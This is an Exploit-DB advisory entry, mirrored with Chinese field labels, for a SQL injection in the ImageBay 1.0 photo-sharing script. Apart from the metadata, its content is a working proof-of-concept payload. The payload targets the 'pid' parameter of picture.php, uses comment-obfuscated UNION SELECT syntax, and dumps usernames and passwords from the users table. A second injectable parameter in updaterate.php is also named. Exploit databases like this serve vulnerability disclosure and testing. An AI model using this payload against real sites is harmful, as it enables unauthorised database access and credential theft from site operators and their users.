ImageBay 1.0 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-08-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42441/
  • # # # # #
    # Exploit Title: ImageBay 1.0 - SQL Injection
    # Dork: N/A
    # Date: 10.08.2017
    # Vendor Homepage : http://www.scriptfolder.com/
    # Software Link: http://www.scriptfolder.com/imagebay-publish-or-share-photography-and-pictures/
    # Demo: http://imagebay.scriptfolder.com/
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    #
    # Proof of Concept:
    # http://localhost/[PATH]/picture.php?pid=[SQL]
    # -22++/*!11111union*/+/*!11111select*/+/*!11111concat*/(username,0x3a,password),0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232+from+users--+-
    # http://localhost/[PATH]/updaterate.php?id=[SQL]
    # Etc...
    # # # # #